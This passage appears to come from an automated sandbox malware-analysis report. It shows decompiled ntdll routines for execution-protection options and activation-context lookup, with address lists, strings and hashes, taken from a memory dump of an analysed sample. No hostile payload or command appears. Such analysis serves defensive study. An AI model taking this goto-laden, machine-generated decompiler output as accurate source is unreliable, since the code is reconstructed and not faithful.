                                                                                                                                                                                      								E1D8BCC1E(_t105, _t106, __eflags);
                                                                                                                                                                                      								__eflags = _t85;
                                                                                                                                                                                      								if(_t85 == 0) {
                                                                                                                                                                                      									goto L8;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t41 = _t85 + 2; // 0x2
                                                                                                                                                                                      								_t106 = _t41;
                                                                                                                                                                                      								__eflags = _t106 - _v552;
                                                                                                                                                                                      							} while (_t106 < _v552);
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                      						_push(3);
                                                                                                                                                                                      						_push(0x55);
                                                                                                                                                                                      						E1D8CEF10();
                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L8:
                                                                                                                                                                                      					_t56 = E1D877648(_t105);
                                                                                                                                                                                      					__eflags = _t56;
                                                                                                                                                                                      					if(_t56 != 0) {
                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t103 = _v556;
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}
































                                                                                                                                                                                      0x1d877560
                                                                                                                                                                                      0x1d877562
                                                                                                                                                                                      0x1d87756f
                                                                                                                                                                                      0x1d877571
                                                                                                                                                                                      0x1d8775ab
                                                                                                                                                                                      0x1d8775b9
                                                                                                                                                                                      0x1d8775b9
                                                                                                                                                                                      0x1d877579
                                                                                                                                                                                      0x1d877583
                                                                                                                                                                                      0x1d87758f
                                                                                                                                                                                      0x1d8b4443
                                                                                                                                                                                      0x1d877595
                                                                                                                                                                                      0x1d87759e
                                                                                                                                                                                      0x1d87759e
                                                                                                                                                                                      0x1d8775a2
                                                                                                                                                                                      0x1d8775bc
                                                                                                                                                                                      0x1d8775c2
                                                                                                                                                                                      0x1d8775c7
                                                                                                                                                                                      0x1d8775c9
                                                                                                                                                                                      0x1d877621
                                                                                                                                                                                      0x1d877623
                                                                                                                                                                                      0x1d877624
                                                                                                                                                                                      0x1d8775f8
                                                                                                                                                                                      0x1d8775ff
                                                                                                                                                                                      0x1d877601
                                                                                                                                                                                      0x1d87762c
                                                                                                                                                                                      0x1d877603
                                                                                                                                                                                      0x1d877609
                                                                                                                                                                                      0x1d877610
                                                                                                                                                                                      0x1d877612
                                                                                                                                                                                      0x1d877612
                                                                                                                                                                                      0x1d877612
                                                                                                                                                                                      0x1d877614
                                                                                                                                                                                      0x1d877616
                                                                                                                                                                                      0x1d877630
                                                                                                                                                                                      0x1d877633
                                                                                                                                                                                      0x1d877633
                                                                                                                                                                                      0x1d877618
                                                                                                                                                                                      0x1d87761a
                                                                                                                                                                                      0x1d8b45c9
                                                                                                                                                                                      0x1d8b45c9
                                                                                                                                                                                      0x1d8b45d1
                                                                                                                                                                                      0x1d8b45d2
                                                                                                                                                                                      0x1d8b45d4
                                                                                                                                                                                      0x1d8b45d6
                                                                                                                                                                                      0x1d8b45d6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d87761a
                                                                                                                                                                                      0x1d8775ce
                                                                                                                                                                                      0x1d8775d4
                                                                                                                                                                                      0x1d8775da
                                                                                                                                                                                      0x1d8775df
                                                                                                                                                                                      0x1d8775e1
                                                                                                                                                                                      0x1d8b444a
                                                                                                                                                                                      0x1d8b4450
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b4456
                                                                                                                                                                                      0x1d8b4469
                                                                                                                                                                                      0x1d8b4476
                                                                                                                                                                                      0x1d8b4486
                                                                                                                                                                                      0x1d8b448b
                                                                                                                                                                                      0x1d8b4497
                                                                                                                                                                                      0x1d8b44b9
                                                                                                                                                                                      0x1d8b44bf
                                                                                                                                                                                      0x1d8b44c1
                                                                                                                                                                                      0x1d8b44c3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b44c9
                                                                                                                                                                                      0x1d8b44cf
                                                                                                                                                                                      0x1d8b44d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b44dc
                                                                                                                                                                                      0x1d8b44de
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b44e6
                                                                                                                                                                                      0x1d8b44ed
                                                                                                                                                                                      0x1d8b44ef
                                                                                                                                                                                      0x1d8b45c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b45c4
                                                                                                                                                                                      0x1d8b44f7
                                                                                                                                                                                      0x1d8b44f8
                                                                                                                                                                                      0x1d8b4510
                                                                                                                                                                                      0x1d8b4515
                                                                                                                                                                                      0x1d8b4524
                                                                                                                                                                                      0x1d8b452b
                                                                                                                                                                                      0x1d8b452c
                                                                                                                                                                                      0x1d8b452e
                                                                                                                                                                                      0x1d8b4556
                                                                                                                                                                                      0x1d8b4561
                                                                                                                                                                                      0x1d8b4567
                                                                                                                                                                                      0x1d8b4569
                                                                                                                                                                                      0x1d8b456c
                                                                                                                                                                                      0x1d8b456e
                                                                                                                                                                                      0x1d8b4574
                                                                                                                                                                                      0x1d8b4576
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b457c
                                                                                                                                                                                      0x1d8b457c
                                                                                                                                                                                      0x1d8b4584
                                                                                                                                                                                      0x1d8b4588
                                                                                                                                                                                      0x1d8b458a
                                                                                                                                                                                      0x1d8b458c
                                                                                                                                                                                      0x1d8b458e
                                                                                                                                                                                      0x1d8b458e
                                                                                                                                                                                      0x1d8b459b
                                                                                                                                                                                      0x1d8b45a0
                                                                                                                                                                                      0x1d8b45a7
                                                                                                                                                                                      0x1d8b45ac
                                                                                                                                                                                      0x1d8b45ae
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b45b4
                                                                                                                                                                                      0x1d8b45b4
                                                                                                                                                                                      0x1d8b45b7
                                                                                                                                                                                      0x1d8b45b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b45bf
                                                                                                                                                                                      0x1d8b4530
                                                                                                                                                                                      0x1d8b4535
                                                                                                                                                                                      0x1d8b4537
                                                                                                                                                                                      0x1d8b4539
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8b453e
                                                                                                                                                                                      0x1d8775e7
                                                                                                                                                                                      0x1d8775e9
                                                                                                                                                                                      0x1d8775ee
                                                                                                                                                                                      0x1d8775f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8775f2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8775a4
                                                                                                                                                                                      0x1d8775a4
                                                                                                                                                                                      0x1d8775a4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8775a4

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D8B4507
                                                                                                                                                                                      • ExecuteOptions, xrefs: 1D8B44AB
                                                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D8B454D
                                                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 1D8B4592
                                                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D8B4530
                                                                                                                                                                                      • Execute=1, xrefs: 1D8B451E
                                                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D8B4460
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                                                      • Opcode ID: d94b41e6cc44e845a824e8304adab99a37bda568424d4fc70c26808b26826114
                                                                                                                                                                                      • Instruction ID: 380dcc602c7cc57afb64565dff8ca86923d637b3a3b1cabbda8981640b2e7bc1
                                                                                                                                                                                      • Opcode Fuzzy Hash: d94b41e6cc44e845a824e8304adab99a37bda568424d4fc70c26808b26826114
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E511935A04219BADF11ABA8DC85FFD77A8FF04304F1105E9E609A7291E770AA45CB62
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 48%
                                                                                                                                                                                      			E1D85A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				char _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                      				signed char _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				char _v36;
                                                                                                                                                                                      				char _v40;
                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                      				char _v56;
                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                      				void* _v72;
                                                                                                                                                                                      				void* _v76;
                                                                                                                                                                                      				void* _v80;
                                                                                                                                                                                      				void* _v84;
                                                                                                                                                                                      				void* _v85;
                                                                                                                                                                                      				void* _v88;
                                                                                                                                                                                      				void* _v96;
                                                                                                                                                                                      				void* _v109;
                                                                                                                                                                                      				intOrPtr _t128;
                                                                                                                                                                                      				void* _t129;
                                                                                                                                                                                      				intOrPtr* _t130;
                                                                                                                                                                                      				intOrPtr _t135;
                                                                                                                                                                                      				void* _t136;
                                                                                                                                                                                      				intOrPtr _t145;
                                                                                                                                                                                      				intOrPtr _t151;
                                                                                                                                                                                      				intOrPtr* _t164;
                                                                                                                                                                                      				intOrPtr _t165;
                                                                                                                                                                                      				signed int _t166;
                                                                                                                                                                                      				intOrPtr _t172;
                                                                                                                                                                                      				intOrPtr _t173;
                                                                                                                                                                                      				intOrPtr _t176;
                                                                                                                                                                                      				signed int _t177;
                                                                                                                                                                                      				intOrPtr _t178;
                                                                                                                                                                                      				intOrPtr _t181;
                                                                                                                                                                                      				void* _t190;
                                                                                                                                                                                      				intOrPtr* _t191;
                                                                                                                                                                                      				intOrPtr _t201;
                                                                                                                                                                                      				signed int _t202;
                                                                                                                                                                                      				void* _t203;
                                                                                                                                                                                      				signed char _t213;
                                                                                                                                                                                      				intOrPtr _t214;
                                                                                                                                                                                      				intOrPtr _t217;
                                                                                                                                                                                      				signed int _t219;
                                                                                                                                                                                      				signed int _t224;
                                                                                                                                                                                      				intOrPtr _t228;
                                                                                                                                                                                      				intOrPtr _t229;
                                                                                                                                                                                      				signed int _t234;
                                                                                                                                                                                      				void* _t236;
                                                                                                                                                                                      				signed int _t240;
                                                                                                                                                                                      				void* _t242;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t178 =  *[fs:0x18];
                                                                                                                                                                                      				_t242 = (_t240 & 0xfffffff8) - 0x3c;
                                                                                                                                                                                      				_t128 =  *((intOrPtr*)(_t178 + 0x30));
                                                                                                                                                                                      				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
                                                                                                                                                                                      					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t129 = 0xc0150001;
                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                      					_v36 = 0xffffffff;
                                                                                                                                                                                      					_v40 = 0;
                                                                                                                                                                                      					if(_a16 == 0) {
                                                                                                                                                                                      						L83:
                                                                                                                                                                                      						_t129 = 0xc000000d;
                                                                                                                                                                                      						goto L33;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t213 = _a4;
                                                                                                                                                                                      						if((_t213 & 0xfffffff8) != 0) {
                                                                                                                                                                                      							goto L83;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t130 = _a20;
                                                                                                                                                                                      							if((_t213 & 0x00000007) == 0) {
                                                                                                                                                                                      								if(_t130 != 0) {
                                                                                                                                                                                      									goto L5;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								if(_t130 == 0) {
                                                                                                                                                                                      									goto L83;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									L5:
                                                                                                                                                                                      									if( *_t130 < 0x24) {
                                                                                                                                                                                      										goto L83;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										L6:
                                                                                                                                                                                      										if((_t213 & 0x00000002) == 0) {
                                                                                                                                                                                      											L9:
                                                                                                                                                                                      											if((_t213 & 0x00000004) != 0) {
                                                                                                                                                                                      												if(_t130 + 0x40 <=  *_t130 + _t130) {
                                                                                                                                                                                      													goto L10;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_push(0xc000000d);
                                                                                                                                                                                      													_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                                      													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                                      													goto L82;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												L10:
                                                                                                                                                                                      												_t233 = _a8;
                                                                                                                                                                                      												_v24 = _t213;
                                                                                                                                                                                      												_t214 =  *[fs:0x18];
                                                                                                                                                                                      												_v16 = _a12;
                                                                                                                                                                                      												_v12 = 0;
                                                                                                                                                                                      												_t172 = _v12;
                                                                                                                                                                                      												_t181 =  *((intOrPtr*)(_t214 + 0x30));
                                                                                                                                                                                      												_v28 = 0x18;
                                                                                                                                                                                      												_v8 = 0;
                                                                                                                                                                                      												_v20 = _a8;
                                                                                                                                                                                      												_v60 = 0;
                                                                                                                                                                                      												_v52 = _t214;
                                                                                                                                                                                      												_v44 = _t181;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													_t135 = _t172;
                                                                                                                                                                                      													if(_t135 != 0) {
                                                                                                                                                                                      														goto L34;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
                                                                                                                                                                                      													if(_t164 == 0) {
                                                                                                                                                                                      														L14:
                                                                                                                                                                                      														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
                                                                                                                                                                                      														_v60 = 0;
                                                                                                                                                                                      														if(_t228 == 0) {
                                                                                                                                                                                      															L36:
                                                                                                                                                                                      															_t228 =  *((intOrPtr*)(_t181 + 0x200));
                                                                                                                                                                                      															_v60 = 0xfffffffc;
                                                                                                                                                                                      															if(_t228 == 0) {
                                                                                                                                                                                      																L87:
                                                                                                                                                                                      																if(_t172 <= 3) {
                                                                                                                                                                                      																	goto L16;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	_t129 = 0xc00000e5;
                                                                                                                                                                                      																	goto L90;
                                                                                                                                                                                      																}
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																_t172 = 3;
                                                                                                                                                                                      																_v12 = 3;
                                                                                                                                                                                      																goto L16;
                                                                                                                                                                                      															}
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															_t172 = 2;
                                                                                                                                                                                      															_v12 = 2;
                                                                                                                                                                                      															goto L16;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														_t165 =  *_t164;
                                                                                                                                                                                      														if(_t165 != 0) {
                                                                                                                                                                                      															_t166 =  *((intOrPtr*)(_t165 + 4));
                                                                                                                                                                                      															_v60 = _t166;
                                                                                                                                                                                      															if(_t166 != 0) {
                                                                                                                                                                                      																if(_t166 == 0xfffffffc) {
                                                                                                                                                                                      																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
                                                                                                                                                                                      																	goto L56;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	if(_t166 == 0xfffffffd) {
                                                                                                                                                                                      																		_t228 = "Actx ";
                                                                                                                                                                                      																		goto L57;
                                                                                                                                                                                      																	} else {
                                                                                                                                                                                      																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
                                                                                                                                                                                      																		goto L56;
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																}
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																L56:
                                                                                                                                                                                      																if(_t228 == 0) {
                                                                                                                                                                                      																	goto L14;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	L57:
                                                                                                                                                                                      																	_t172 = 1;
                                                                                                                                                                                      																	_v12 = 1;
                                                                                                                                                                                      																	L16:
                                                                                                                                                                                      																	if(_t228 == 0) {
                                                                                                                                                                                      																		_t129 = 0xc0150001;
                                                                                                                                                                                      																		L90:
                                                                                                                                                                                      																		_t234 = 0;
                                                                                                                                                                                      																		goto L91;
                                                                                                                                                                                      																	} else {
                                                                                                                                                                                      																		_t129 = E1D85A600(_t228, _t233, _a12,  &_v56,  &_v48);
                                                                                                                                                                                      																		if(_t129 < 0) {
                                                                                                                                                                                      																			_t234 = 0;
                                                                                                                                                                                      																			if(_t129 != 0xc0150001 || _t172 == 3) {
                                                                                                                                                                                      																				goto L19;
                                                                                                                                                                                      																			} else {
                                                                                                                                                                                      																				_t181 = _v44;
                                                                                                                                                                                      																				_t214 = _v52;
                                                                                                                                                                                      																				_t233 = _a8;
                                                                                                                                                                                      																				continue;
                                                                                                                                                                                      																			}
                                                                                                                                                                                      																		} else {
                                                                                                                                                                                      																			_t224 = _v60;
                                                                                                                                                                                      																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
                                                                                                                                                                                      																			asm("sbb esi, esi");
                                                                                                                                                                                      																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
                                                                                                                                                                                      																			_t129 = 0;
                                                                                                                                                                                      																			L19:
                                                                                                                                                                                      																			if(_t129 < 0) {
                                                                                                                                                                                      																				L91:
                                                                                                                                                                                      																				if(_t129 < 0) {
                                                                                                                                                                                      																					goto L33;
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					goto L20;
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																			} else {
                                                                                                                                                                                      																				L20:
                                                                                                                                                                                      																				_t173 = _v48;
                                                                                                                                                                                      																				if(_t173 < 0x2c) {
                                                                                                                                                                                      																					L110:
                                                                                                                                                                                      																					_t138 = _v56;
                                                                                                                                                                                      																					goto L111;
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					_t229 = _a20;
                                                                                                                                                                                      																					while(1) {
                                                                                                                                                                                      																						L22:
                                                                                                                                                                                      																						_t138 = _v56;
                                                                                                                                                                                      																						if( *_v56 != 0x64487353) {
                                                                                                                                                                                      																							break;
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																						_t242 = _t242 - 8;
                                                                                                                                                                                      																						_t129 = E1D85A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
                                                                                                                                                                                      																						if(_t129 >= 0) {
                                                                                                                                                                                      																							_t83 = _t234 - 1; // -1
                                                                                                                                                                                      																							if((_t83 | 0x00000007) != 0xffffffff) {
                                                                                                                                                                                      																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                                                                                                      																								_v40 = _t145;
                                                                                                                                                                                      																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
                                                                                                                                                                                      																									 *((char*)(_t242 + 0xf)) = 0;
                                                                                                                                                                                      																									 *0x1d9391e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
                                                                                                                                                                                      																									_v40();
                                                                                                                                                                                      																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
                                                                                                                                                                                      																									if( *((char*)(_t242 + 0xf)) != 0) {
                                                                                                                                                                                      																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
                                                                                                                                                                                      																									}
                                                                                                                                                                                      																								}
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																							if(_t229 == 0) {
                                                                                                                                                                                      																								L67:
                                                                                                                                                                                      																								return 0;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								_t129 = E1D844428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
                                                                                                                                                                                      																								if(_t129 < 0) {
                                                                                                                                                                                      																									goto L33;
                                                                                                                                                                                      																								} else {
                                                                                                                                                                                      																									goto L67;
                                                                                                                                                                                      																								}
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							if(_t129 != 0xc0150008) {
                                                                                                                                                                                      																								L33:
                                                                                                                                                                                      																								return _t129;
                                                                                                                                                                                      																							} else {
                                                                                                                                                                                      																								_t217 =  *[fs:0x18];
                                                                                                                                                                                      																								_t234 = 0;
                                                                                                                                                                                      																								_v68 = 0;
                                                                                                                                                                                      																								_v40 = _t217;
                                                                                                                                                                                      																								_v60 = 0;
                                                                                                                                                                                      																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
                                                                                                                                                                                      																								_t176 = _v20;
                                                                                                                                                                                      																								L26:
                                                                                                                                                                                      																								while(1) {
                                                                                                                                                                                      																									if(_t176 <= 2) {
                                                                                                                                                                                      																										_t190 = _t176 - _t234;
                                                                                                                                                                                      																										if(_t190 == 0) {
                                                                                                                                                                                      																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
                                                                                                                                                                                      																											if(_t191 == 0) {
                                                                                                                                                                                      																												goto L68;
                                                                                                                                                                                      																											} else {
                                                                                                                                                                                      																												_t201 =  *_t191;
                                                                                                                                                                                      																												if(_t201 == 0) {
                                                                                                                                                                                      																													goto L68;
                                                                                                                                                                                      																												} else {
                                                                                                                                                                                      																													_t202 =  *((intOrPtr*)(_t201 + 4));
                                                                                                                                                                                      																													_v60 = _t202;
                                                                                                                                                                                      																													if(_t202 == 0) {
                                                                                                                                                                                      																														L102:
                                                                                                                                                                                      																														if(_t151 == 0) {
                                                                                                                                                                                      																															goto L68;
                                                                                                                                                                                      																														} else {
                                                                                                                                                                                      																															goto L103;
                                                                                                                                                                                      																														}
                                                                                                                                                                                      																													} else {
                                                                                                                                                                                      																														if(_t202 != 0xfffffffc) {
                                                                                                                                                                                      																															if(_t202 != 0xfffffffd) {
                                                                                                                                                                                      																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
                                                                                                                                                                                      																																goto L101;
                                                                                                                                                                                      																															} else {
                                                                                                                                                                                      																																_t151 = "Actx ";
                                                                                                                                                                                      																																_v68 = _t151;
                                                                                                                                                                                      																																L103:
                                                                                                                                                                                      																																_t176 = 1;
                                                                                                                                                                                      																																_v20 = 1;
                                                                                                                                                                                      																																goto L28;
                                                                                                                                                                                      																															}
                                                                                                                                                                                      																														} else {
                                                                                                                                                                                      																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
                                                                                                                                                                                      																															L101:
                                                                                                                                                                                      																															_v68 = _t151;
                                                                                                                                                                                      																															goto L102;
                                                                                                                                                                                      																														}
                                                                                                                                                                                      																													}
                                                                                                                                                                                      																												}
                                                                                                                                                                                      																											}
                                                                                                                                                                                      																										} else {
                                                                                                                                                                                      																											_t203 = _t190 - 1;
                                                                                                                                                                                      																											if(_t203 == 0) {
                                                                                                                                                                                      																												L68:
                                                                                                                                                                                      																												_v60 = 0;
                                                                                                                                                                                      																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
                                                                                                                                                                                      																												_v68 = _t151;
                                                                                                                                                                                      																												if(_t151 == 0) {
                                                                                                                                                                                      																													goto L44;
                                                                                                                                                                                      																												} else {
                                                                                                                                                                                      																													_t176 = 2;
                                                                                                                                                                                      																													_v20 = 2;
                                                                                                                                                                                      																													goto L28;
                                                                                                                                                                                      																												}
                                                                                                                                                                                      																											} else {
                                                                                                                                                                                      																												if(_t203 != 1) {
                                                                                                                                                                                      																													goto L27;
                                                                                                                                                                                      																												} else {
                                                                                                                                                                                      																													L44:
                                                                                                                                                                                      																													_v60 = 0xfffffffc;
                                                                                                                                                                                      																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
                                                                                                                                                                                      																													_v68 = _t151;
                                                                                                                                                                                      																													if(_t151 == 0) {
                                                                                                                                                                                      																														goto L27;
                                                                                                                                                                                      																													} else {
                                                                                                                                                                                      																														_t176 = 3;
                                                                                                                                                                                      																														_v20 = 3;
                                                                                                                                                                                      																														goto L28;
                                                                                                                                                                                      																													}
                                                                                                                                                                                      																												}
                                                                                                                                                                                      																											}
                                                                                                                                                                                      																										}
                                                                                                                                                                                      																									} else {
                                                                                                                                                                                      																										L27:
                                                                                                                                                                                      																										if(_t176 > 3) {
                                                                                                                                                                                      																											_t129 = 0xc00000e5;
                                                                                                                                                                                      																											goto L30;
                                                                                                                                                                                      																										} else {
                                                                                                                                                                                      																											L28:
                                                                                                                                                                                      																											if(_t151 != 0) {
                                                                                                                                                                                      																												_t129 = E1D85A600(_t151, _a8, _a12,  &_v64,  &_v56);
                                                                                                                                                                                      																												if(_t129 < 0) {
                                                                                                                                                                                      																													_t219 = 0;
                                                                                                                                                                                      																													if(_t129 != 0xc0150001 || _t176 == 3) {
                                                                                                                                                                                      																														goto L48;
                                                                                                                                                                                      																													} else {
                                                                                                                                                                                      																														_t151 = _v68;
                                                                                                                                                                                      																														_t217 = _v40;
                                                                                                                                                                                      																														continue;
                                                                                                                                                                                      																													}
                                                                                                                                                                                      																												} else {
                                                                                                                                                                                      																													_t177 = _v60;
                                                                                                                                                                                      																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
                                                                                                                                                                                      																													asm("sbb edx, edx");
                                                                                                                                                                                      																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
                                                                                                                                                                                      																													_t129 = 0;
                                                                                                                                                                                      																													L48:
                                                                                                                                                                                      																													if(_t129 < 0) {
                                                                                                                                                                                      																														goto L31;
                                                                                                                                                                                      																													} else {
                                                                                                                                                                                      																														if(_t219 != 0) {
                                                                                                                                                                                      																															_t125 = _t219 - 1; // -1
                                                                                                                                                                                      																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
                                                                                                                                                                                      																																while(1) {
                                                                                                                                                                                      																																	_t236 =  *_t219;
                                                                                                                                                                                      																																	if(_t236 == 0x7fffffff) {
                                                                                                                                                                                      																																		goto L50;
                                                                                                                                                                                      																																	}
                                                                                                                                                                                      																																	asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                      																																	if(_t236 != _t236) {
                                                                                                                                                                                      																																		continue;
                                                                                                                                                                                      																																	} else {
                                                                                                                                                                                      																																		goto L50;
                                                                                                                                                                                      																																	}
                                                                                                                                                                                      																																	goto L112;
                                                                                                                                                                                      																																}
                                                                                                                                                                                      																															}
                                                                                                                                                                                      																														}
                                                                                                                                                                                      																														L50:
                                                                                                                                                                                      																														_t234 = _t219;
                                                                                                                                                                                      																														goto L51;
                                                                                                                                                                                      																													}
                                                                                                                                                                                      																												}
                                                                                                                                                                                      																											} else {
                                                                                                                                                                                      																												_t129 = 0xc0150001;
                                                                                                                                                                                      																												L30:
                                                                                                                                                                                      																												if(_t129 >= 0) {
                                                                                                                                                                                      																													L51:
                                                                                                                                                                                      																													_t173 = _v56;
                                                                                                                                                                                      																													if(_t173 >= 0x2c) {
                                                                                                                                                                                      																														goto L22;
                                                                                                                                                                                      																													} else {
                                                                                                                                                                                      																														goto L110;
                                                                                                                                                                                      																													}
                                                                                                                                                                                      																												} else {
                                                                                                                                                                                      																													L31:
                                                                                                                                                                                      																													if(_t129 == 0xc0150001) {
                                                                                                                                                                                      																														_t129 = 0xc0150008;
                                                                                                                                                                                      																													}
                                                                                                                                                                                      																													goto L33;
                                                                                                                                                                                      																												}
                                                                                                                                                                                      																											}
                                                                                                                                                                                      																										}
                                                                                                                                                                                      																									}
